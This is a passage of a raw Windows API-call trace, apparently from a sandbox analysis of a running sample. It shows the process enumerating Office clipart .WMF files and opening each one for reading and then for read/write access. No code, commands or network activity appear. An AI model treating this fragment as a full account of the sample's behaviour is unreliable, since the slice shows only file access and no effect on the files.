lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0101.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.197] AreFileApisANSI () returned 1 [0101.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 69 [0101.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.198] GetFileType (hFile=0x33c) returned 0x1 [0101.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.198] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.198] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.198] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.198] CloseHandle (hObject=0x33c) returned 1 [0101.198] AreFileApisANSI () returned 1 [0101.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0101.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 69 [0101.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.199] GetFileType (hFile=0x33c) returned 0x1 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.199] CloseHandle (hObject=0x33c) returned 1 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.200] AreFileApisANSI () returned 1 [0101.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 69 [0101.200] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea2)) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0101.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.201] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16cc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01216_.WMF", cAlternateFileName="")) returned 1 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0101.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0101.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0101.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.202] AreFileApisANSI () returned 1 [0101.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0101.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0101.202] AreFileApisANSI () returned 1 [0101.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0101.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 69 [0101.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.202] GetFileType (hFile=0x33c) returned 0x1 [0101.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.203] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.203] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.205] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.206] CloseHandle (hObject=0x33c) returned 1 [0101.206] AreFileApisANSI () returned 1 [0101.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0101.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 69 [0101.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.206] GetFileType (hFile=0x33c) returned 0x1 [0101.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0101.206] CloseHandle (hObject=0x33c) returned 1 [0101.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.209] AreFileApisANSI () returned 1 [0101.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 69 [0101.209] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16cc)) returned 1 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0101.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.209] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01218_.WMF", cAlternateFileName="")) returned 1 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 